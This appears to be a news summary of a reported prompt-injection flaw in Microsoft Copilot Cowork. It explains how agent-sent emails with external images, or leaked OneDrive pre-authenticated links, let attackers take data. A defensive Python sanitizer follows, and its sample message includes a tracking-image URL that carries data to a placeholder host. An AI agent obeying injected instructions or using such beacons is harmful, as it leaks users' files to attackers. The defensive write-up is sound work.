Microsoft Copilot Cowork Vulnerability Allows File Exfiltration
A security flaw in Microsoft Copilot Cowork, an agentic system, enables attackers to exfiltrate data by exploiting its email approval mechanism. The system allows agents to send emails to the user's own inbox without approval, and these messages can contain external images. When the user opens such a message, the images trigger network requests to external websites, leaking data to attackers. Additionally, OneDrive can create pre-authenticated download links, and a successful prompt injection can leak these links, allowing attackers to download files. The vulnerability was reported by Simon Willison on May 26, 2026.
Key facts
- Microsoft Copilot Cowork is a real product name.
- The system allows agents to send emails to the user's inbox without approval.
- Emails can contain external images that trigger network requests to external websites.
- Data can be exfiltrated when a user opens a compromised message.
- OneDrive can create pre-authenticated download links.
- Successful prompt injection can leak these links, enabling file downloads by attackers.
- The vulnerability was reported by Simon Willison.
- The report was posted on May 26, 2026.
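A defensive sketch for the email path described above, added here as an example and not taken from the original report or from Microsoft: it strips attributes that make a mail client fetch remote resources from an agent-authored HTML body before delivery, and records what it removed. The function names, the attribute list and the sample message are assumptions constructed for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# http://, https:// and protocol-relative // targets all leave the mailbox.
REMOTE = re.compile(r"\s*(?:https?:)?//", re.I)
CSS_URL = re.compile(r"url\(\s*['\"]?\s*(?:https?:)?//[^)]*\)", re.I)
AUTO_FETCH_ATTRS = {"src", "srcset", "background", "poster"}  # assumed list

def is_remote(name, value):
    parts = value.split(",") if name == "srcset" else [value]
    return any(REMOTE.match(p) for p in parts)

class RemoteLoadStripper(HTMLParser):
    """Re-emit HTML without attributes that fetch remote resources on render.
    Comments and declarations are dropped; <style>/<link> are out of scope."""
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out, self.findings = [], []
    def _emit(self, tag, attrs, close=""):
        kept = []
        for name, value in attrs:
            value = value or ""
            if name in AUTO_FETCH_ATTRS and is_remote(name, value):
                self.findings.append((tag, name, value))  # keep for alerting
                continue
            if name == "style" and CSS_URL.search(value):
                self.findings.append((tag, name, value))
                value = CSS_URL.sub("none", value)
            kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}{close}>")
    def handle_starttag(self, tag, attrs):
        self._emit(tag, attrs)
    def handle_startendtag(self, tag, attrs):
        self._emit(tag, attrs, " /")
    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(data)
    def handle_entityref(self, name):
        self.out.append(f"&{name};")
    def handle_charref(self, name):
        self.out.append(f"&#{name};")

def sanitize(html_body):
    parser = RemoteLoadStripper()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out), parser.findings

# Constructed sample body; collector.example is a placeholder host.
SAMPLE = ('<p>Weekly summary &amp; notes</p>'
          '<img src="https://collector.example/p.png?d=Q1-forecast" width="1">'
          '<img src="cid:logo@local" alt="logo">'
          '<div style="background:url(//collector.example/b.gif?d=abc)">hi</div>')
```

Embedded `cid:` images pass through unchanged, so inline attachments still render while nothing in the body can reach an external host when the message is opened.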
Entities
Institutions
- Microsoft
- OneDrive
- Simon Willison